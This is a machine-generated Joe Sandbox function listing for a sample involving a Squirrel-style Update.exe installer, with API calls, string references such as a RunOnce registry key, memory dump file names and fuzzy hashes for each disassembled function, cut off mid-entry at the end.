Function 00F9C75B Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00F9C77E

Part of subcall function 00F9C6CB: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F9C6FA
Part of subcall function 00F9C6CB: ___AdjustPointer.LIBCMT ref: 00F9C715

_UnwindNestedFrames.LIBCMT ref: 00F9C793
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F9C7A4
CallCatchBlock.LIBVCRUNTIME ref: 00F9C7CC

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: a4cc5d77aec23feabc3e505a67bb6e8156291396e68f30ec5adec5d2384a8742
Instruction ID: 42bcff34d4b23e5faad89bd4de34efeb50f8da3f3ec66641a0fc818c60175a1e
Opcode Fuzzy Hash: a4cc5d77aec23feabc3e505a67bb6e8156291396e68f30ec5adec5d2384a8742
Instruction Fuzzy Hash: 68111B32500108BBEF116F95DD86DEF7F69EF88754F044414FE1856121D736E861EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F9C764 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00F9C77E

Part of subcall function 00F9C6CB: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F9C6FA
Part of subcall function 00F9C6CB: ___AdjustPointer.LIBCMT ref: 00F9C715

_UnwindNestedFrames.LIBCMT ref: 00F9C793
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F9C7A4
CallCatchBlock.LIBVCRUNTIME ref: 00F9C7CC

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
Instruction ID: 4cbf26fe580207e19dd210b8ab3762dad689e8c74c3b19379c5b2af81c8c3b67
Opcode Fuzzy Hash: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
Instruction Fuzzy Hash: 15010C32500108BBEF126F95DD85DEF7F69EF88754F044514FE0856121C736E861EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC8C5 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00FAB692,00000000,00000001,00000000,00000000,?,00FAA0BC,00000000,00000020,00000000), ref: 00FAC8DC
GetLastError.KERNEL32(?,00FAB692,00000000,00000001,00000000,00000000,?,00FAA0BC,00000000,00000020,00000000,00000000,00000000,?,00FAA610,00000000), ref: 00FAC8E8

Part of subcall function 00FAC8AE: CloseHandle.KERNEL32(FFFFFFFE,00FAC8F8,?,00FAB692,00000000,00000001,00000000,00000000,?,00FAA0BC,00000000,00000020,00000000,00000000,00000000), ref: 00FAC8BE

___initconout.LIBCMT ref: 00FAC8F8

Part of subcall function 00FAC870: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FAC89F,00FAB67F,00000000,?,00FAA0BC,00000000,00000020,00000000,00000000), ref: 00FAC883

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00FAB692,00000000,00000001,00000000,00000000,?,00FAA0BC,00000000,00000020,00000000,00000000), ref: 00FAC90D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: db1c5f3a814df9d733b9dbf9d46ed894e421885df24c1e3b0e777f2c32c8aaf6
Instruction ID: 3d4a089e0754af0939aa18394a49becf5c266f1297adc2ab87d1c48abbd06e08
Opcode Fuzzy Hash: db1c5f3a814df9d733b9dbf9d46ed894e421885df24c1e3b0e777f2c32c8aaf6
Instruction Fuzzy Hash: 39F03076501118BBCF222FD5DC05A8A3F76FF0A7A0B014020FB1885130D632C920FBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA205C Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FA2065

Part of subcall function 00FA363A: HeapFree.KERNEL32(00000000,00000000,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?), ref: 00FA3650
Part of subcall function 00FA363A: GetLastError.KERNEL32(?,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?,?), ref: 00FA3662

_free.LIBCMT ref: 00FA2078
_free.LIBCMT ref: 00FA2089
_free.LIBCMT ref: 00FA209A

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a31c4fd60ebe2f3e8b2f474012bbe4fd21ae732c0f7c7094c67afe9b2141e5e3
Instruction ID: cc60d24a03c312bf3cb21e6ceb52572f6a1b2df68584238932f2453a93470d88
Opcode Fuzzy Hash: a31c4fd60ebe2f3e8b2f474012bbe4fd21ae732c0f7c7094c67afe9b2141e5e3
Instruction Fuzzy Hash: 27E0B6B18101AEAFC6126F15FD82C493AA2F7A5716325030AF45A12331CBB90612BEC9

Uniqueness

Uniqueness Score: -1.00%

Function 00F98465 Relevance: 5.4, APIs: 4, Instructions: 358stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,00FB7574,?,C93D651F,?,00000000,?,?,?,00FAE1C6,000000FF,?,00F990FD,?,00000000,?), ref: 00F984E8
lstrcmpiW.KERNEL32(?,00FB7578,?,00F990FD,?,00000000,?,?,?,?,0002001F,?,00000000,00000000,?,00FAE204), ref: 00F984FE

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 4e126236f407b2606c8b76815d2046a9ad29fc85dd5b2b56389b7341648b9704
Instruction ID: 3ff45804b3e1097445cbab21dc2a76027b339b1f725cd8b0d419ea54787307ed
Opcode Fuzzy Hash: 4e126236f407b2606c8b76815d2046a9ad29fc85dd5b2b56389b7341648b9704
Instruction Fuzzy Hash: 05D1F971D00218CBEF35DF14CC84AED77B5AF19790F1441AAE609A7241DB309E96EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A648 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00F9AC4E

Part of subcall function 00F9C3D9: RaiseException.KERNEL32(?,?,?,00F9AC70,?,?,00000000,?,?,?,?,?,00F9AC70,?,00FB8920), ref: 00F9C439

__CxxThrowException@8.LIBVCRUNTIME ref: 00F9AC6B

Strings

Unknown exception, xrefs: 00F9AC78

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 54fabd9ed8c36c9cb569bc5351265e25fc09c2061542cebcfb2cb85660865747
Instruction ID: 3db3c2da74f6a67b69645e5b39e74431e78a30e28a13e540067ff80ad4f89ba5
Opcode Fuzzy Hash: 54fabd9ed8c36c9cb569bc5351265e25fc09c2061542cebcfb2cb85660865747
Instruction Fuzzy Hash: DCF0C234D0020DB7EF14BAA9EC06D9D736CAA013A0F608260B825D9491EF74DA09B9C7

Uniqueness

Uniqueness Score: -1.00%

Function 00F91847 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006), ref: 00F9189A

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F91868
SquirrelInstall, xrefs: 00F918A8

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: FileModuleName
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$SquirrelInstall
API String ID: 514040917-3364363029
Opcode ID: 9db8ae8b3f66ad47122adace9910abd0ac32f25d456fccc2705f1b855d964c8a
Instruction ID: 4de2302420a477a4ae5c459eedb19251d27ede0faf583df6650ca33e6c2a6a34
Opcode Fuzzy Hash: 9db8ae8b3f66ad47122adace9910abd0ac32f25d456fccc2705f1b855d964c8a
Instruction Fuzzy Hash: B3016770A8021D9FEB50EF61DDC5AE97378BB14300F4001B9A515A7191EA749F88DE80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Update.exePID: 4432, Parent PID: 4952COMMON

Executed Functions

Function 00007FF848F10F18 Relevance: 18.4, Strings: 14, Instructions: 947COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F12AEA
rU_H, xrefs: 00007FF848F1308D
HAH, xrefs: 00007FF848F12E26
HAH, xrefs: 00007FF848F12B89
HAH, xrefs: 00007FF848F12A44
HAH, xrefs: 00007FF848F12CF6
wU_H, xrefs: 00007FF848F12B93
HAH, xrefs: 00007FF848F12D7D
HAH, xrefs: 00007FF848F13083
HAH, xrefs: 00007FF848F12DBD
HAH, xrefs: 00007FF848F12BAB
HAH, xrefs: 00007FF848F12D36
HAH, xrefs: 00007FF848F12E04
HAH, xrefs: 00007FF848F12B2D

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$rU_H$wU_H
API String ID: 0-780971432
Opcode ID: 65f8b201db8b88cc433f80c1fad7ff2f25e4a795cacd04879b1c9d8123ebad07
Instruction ID: d1e682f491a9b5b9b4ad7101e6d763f553836b52ab2383e65a775eb88a5a8693
Opcode Fuzzy Hash: 65f8b201db8b88cc433f80c1fad7ff2f25e4a795cacd04879b1c9d8123ebad07
Instruction Fuzzy Hash: 7842F431F1C91A4FE658E7ACA8566B973D1EF957A0F14027AD44EC32C6DF28AC438385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3694D Relevance: 8.2, Strings: 6, Instructions: 725COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F36DCC
HAH, xrefs: 00007FF848F36E4D
HAH, xrefs: 00007FF848F36EA0
HAH, xrefs: 00007FF848F36D12
HAH, xrefs: 00007FF848F36EF8
HAH, xrefs: 00007FF848F36F4D

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH$HAH$HAH
API String ID: 0-381444693
Opcode ID: c419db94b968138d050c7869acd1c8226f8b74fe9a6b83823773197cb6d80871
Instruction ID: 11e54a68fac367968eb859802cb0c00a2af7000883ec5b19c17b344405b926bd
Opcode Fuzzy Hash: c419db94b968138d050c7869acd1c8226f8b74fe9a6b83823773197cb6d80871
Instruction Fuzzy Hash: DE22D031A1CA498FE798EB2CD495275B3D2FF98791F0445BAD48EC32D2DE2CAC428745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10F25 Relevance: 2.9, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

4O_^, xrefs: 00007FF848F11001
3O_^, xrefs: 00007FF848F11101

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: 3O_^$4O_^
API String ID: 0-1664080262
Opcode ID: f4ec19b3b2c4824832fb1b79d87611afcef5eb750378760a8616478bde788bf9
Instruction ID: 2000874af6cab0634d881aa849bd8706ea5b768d9f3a3eec30d43227d479ea9c
Opcode Fuzzy Hash: f4ec19b3b2c4824832fb1b79d87611afcef5eb750378760a8616478bde788bf9
Instruction Fuzzy Hash: 87C1AB2791F5A25BD741B77D74921E67BA0EF413BDF0842B7D1CC8D093DE1C688A82A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3337D Relevance: 1.2, Instructions: 1160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c660f093ba253f4fe405098978cad2bb096cf31868b14e20e0d0bffef436bab
Instruction ID: cb3cc777dcdb2fa9c6a4cdb90ec5bff3527193c1a1f34f76744b6c307dbd3f8a
Opcode Fuzzy Hash: 6c660f093ba253f4fe405098978cad2bb096cf31868b14e20e0d0bffef436bab
Instruction Fuzzy Hash: 7782AF70A28B098FD368DF1CD485571B7E1FB54714B244A6EC48BC7A92DB35F8838B85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12000 Relevance: 14.1, Strings: 11, Instructions: 355COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F12292
HAH, xrefs: 00007FF848F12358
HAH, xrefs: 00007FF848F1227B
H, xrefs: 00007FF848F122EE
HAH, xrefs: 00007FF848F12206
HAH, xrefs: 00007FF848F12305
HAH, xrefs: 00007FF848F121B5
HAH, xrefs: 00007FF848F12242
HAH, xrefs: 00007FF848F121EF
HAH, xrefs: 00007FF848F12341
HAH, xrefs: 00007FF848F122E3

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: H$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
API String ID: 0-3442563395
Opcode ID: c7a39c5c29bee0e95dd63b95ebfc35f4377314c7f18f06d76c4dfab09d5d1ae1
Instruction ID: 98892cb9b957af844cc28a6897c3349f30148ec19e45293d65fe23c9e08cb34a
Opcode Fuzzy Hash: c7a39c5c29bee0e95dd63b95ebfc35f4377314c7f18f06d76c4dfab09d5d1ae1
Instruction Fuzzy Hash: 14A1C332E1DA4A4FF6A8E7AC54563B9A3D2FF99794F44017AD00EC32C6DF28AC464345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31675 Relevance: 10.6, Strings: 8, Instructions: 556COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F31A86
HAH, xrefs: 00007FF848F31A14
HAH, xrefs: 00007FF848F319A1
HAH, xrefs: 00007FF848F31968
HAH, xrefs: 00007FF848F31A4D
HAH, xrefs: 00007FF848F319DA
HAH, xrefs: 00007FF848F316CA
HAH, xrefs: 00007FF848F31B58

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
API String ID: 0-4024470385
Opcode ID: 5407ad1a6ac3f5e72ec90045a335268e519230d0db28643c8a54b5d20298eddc
Instruction ID: 324a2aafeff6b5095338fd85a20e9cf6f57f6cbce4c577c4a2f9a4d3df32c485
Opcode Fuzzy Hash: 5407ad1a6ac3f5e72ec90045a335268e519230d0db28643c8a54b5d20298eddc
Instruction Fuzzy Hash: C702D031E1DA4A8FE7A8EB28945527573D1FF58791F1405BEE44EC32C2DF28AC828749

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24C64 Relevance: 9.1, Strings: 7, Instructions: 365COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F24E87
HAH, xrefs: 00007FF848F24F7F
HAH, xrefs: 00007FF848F24DFF
HAH, xrefs: 00007FF848F24F38
HAH, xrefs: 00007FF848F24DC1
HAH, xrefs: 00007FF848F24EC3
TT_H, xrefs: 00007FF848F24E91

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH$HAH$HAH$TT_H
API String ID: 0-698164713
Opcode ID: 73f5b861d7e2767d02c1546948abb7289175abd1896a3df94c16b55ad5284d9f
Instruction ID: 636540ac7f566580bc517a11fbcaecb3ec90d34c75040337e945ab15a7b4150b
Opcode Fuzzy Hash: 73f5b861d7e2767d02c1546948abb7289175abd1896a3df94c16b55ad5284d9f
Instruction Fuzzy Hash: 99A1F372F1DD5A0FE6A9B72C64562B927D2EFE9B90F0501BAD00DC32C7DE196C064385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F18A08 Relevance: 5.6, Strings: 4, Instructions: 584COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F1B5E9
HAH, xrefs: 00007FF848F1B528
HAH, xrefs: 00007FF848F1B561
HAH, xrefs: 00007FF848F1B5A5

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH
API String ID: 0-4204409433
Opcode ID: 5e651519192d1439b5212fc236c656f316a1a91cc107dd2db8adf2da312db1d4
Instruction ID: 88ad523c7d2bbca87dd827f29b568f012f8060e8db326083c15e30841f276938
Opcode Fuzzy Hash: 5e651519192d1439b5212fc236c656f316a1a91cc107dd2db8adf2da312db1d4
Instruction Fuzzy Hash: 0F022331B2D90A8FE789EB2C945567973D2EF99790F0401BAD80DC72D7DE28EC468341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F298C8 Relevance: 5.4, Strings: 4, Instructions: 421COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F2F448
HAH, xrefs: 00007FF848F2F40F
HAH, xrefs: 00007FF848F2F481
0M_H, xrefs: 00007FF848F2F474

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: 0M_H$HAH$HAH$HAH
API String ID: 0-877430467
Opcode ID: 44fdd92f6fa84ba4b7831527b777fce2e0620a16a3a58f4a5166ebf335be984d
Instruction ID: fa0c24ab2a5606e1c96dd88835790838828eb0f632418b3cae89abd55d36f815
Opcode Fuzzy Hash: 44fdd92f6fa84ba4b7831527b777fce2e0620a16a3a58f4a5166ebf335be984d
Instruction Fuzzy Hash: 94C10731A2D94A4FE7A8EB2CA45567577D1FF59750F1402BAD84EC32C7DF2AAC028384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F13A69 Relevance: 5.2, Strings: 4, Instructions: 206COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F13BBA
HAH, xrefs: 00007FF848F13B81
N_H, xrefs: 00007FF848F13B74
HAH, xrefs: 00007FF848F13BE9

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$N_H
API String ID: 0-2966270611
Opcode ID: cbc8142ef013a55bc8760bfc96614332ef6e709e956b23f6351c2231229c2ead
Instruction ID: 7a1cb36b11f856b53f4221458ff1773c992c2104a51c20f429356f859c9e16f7
Opcode Fuzzy Hash: cbc8142ef013a55bc8760bfc96614332ef6e709e956b23f6351c2231229c2ead
Instruction Fuzzy Hash: 2751CE31A0DA8A5FE7A8EB2C845967577E1EF95350F1801BAC04EC72D2DF2CAC468780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21969 Relevance: 4.5, Strings: 3, Instructions: 767COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F21F20
HAH, xrefs: 00007FF848F21EE6
HAH, xrefs: 00007FF848F21DD2

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH
API String ID: 0-2719557456
Opcode ID: 14c1f8adf638bf66bdd13427a1bfb94641f41b22fc2d5169abb6d3377db45e46
Instruction ID: f2af16010c97b2d8db4a34f6a474b2f782bb72f3ac7f979407f9e829bf404caa
Opcode Fuzzy Hash: 14c1f8adf638bf66bdd13427a1bfb94641f41b22fc2d5169abb6d3377db45e46
Instruction Fuzzy Hash: C9222232F1D95A4FE798A7AC78562B577D1EF94790F0401BAC40DC32D7EE1ABC824289

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10E30 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

N_H, xrefs: 00007FF848F13970
HAH, xrefs: 00007FF848F1381A
HAH, xrefs: 00007FF848F139A0

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$N_H
API String ID: 0-3897468826
Opcode ID: abab72ec03c4fde113bdde06500c45919c7aa4bff387a3122774e5b998cfba80
Instruction ID: 15473ab5bd9a044798b157ed8811e5ae128ef74590ce942faf0f60b19a3ba0d2
Opcode Fuzzy Hash: abab72ec03c4fde113bdde06500c45919c7aa4bff387a3122774e5b998cfba80
Instruction Fuzzy Hash: FBD1BF31A0DA098FD798EB2CD499A6577E2FF98351B1001BED44EC7296DF29EC82C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F200D3 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F224B2
HAH, xrefs: 00007FF848F224EC
HAH, xrefs: 00007FF848F22478

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH
API String ID: 0-2719557456
Opcode ID: f33de0e1ee83eb355357387cf6af3e3600ecb8410defaa080f09ad172819c0b3
Instruction ID: 4d4d2d76d31c3127e60bccd0d9a3cc0eebfd8be71d91a8c15e20f35287119035
Opcode Fuzzy Hash: f33de0e1ee83eb355357387cf6af3e3600ecb8410defaa080f09ad172819c0b3
Instruction Fuzzy Hash: D4A14733E0EA964FE399B76C78262B9A7D0EF956A4F0405BBC04DC71C3DE196C064395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2A1FB Relevance: 4.1, Strings: 3, Instructions: 374COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F2A431
HAH, xrefs: 00007FF848F2A382
p, xrefs: 00007FF848F2A23C

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: H$HAH$p
API String ID: 0-3959928623
Opcode ID: 6b8a770a78e546c26e84f25ec6457d1b0be10630b5d0c906ddf5fdf0aff653c7
Instruction ID: d59018b27828fb25d8f161421c747734c44f47376dc4c9fbb52ece5170ac3bd5
Opcode Fuzzy Hash: 6b8a770a78e546c26e84f25ec6457d1b0be10630b5d0c906ddf5fdf0aff653c7
Instruction Fuzzy Hash: 84B13632A0E9894FE355B73C68552B67BA0EF55364B0802FBC04DC71C7DE1EA8464354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2C7E0 Relevance: 4.1, Strings: 3, Instructions: 369COMMON

Download Yara Rule

Strings

PK00, xrefs: 00007FF848F2C915
ZM_H, xrefs: 00007FF848F2CA6D
HAH, xrefs: 00007FF848F2CA8F

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$PK00$ZM_H
API String ID: 0-3705177557
Opcode ID: 72f2684b9429a282842b808c4b1ce832ad930e7ab4fc68c27a5fbd0528085b95
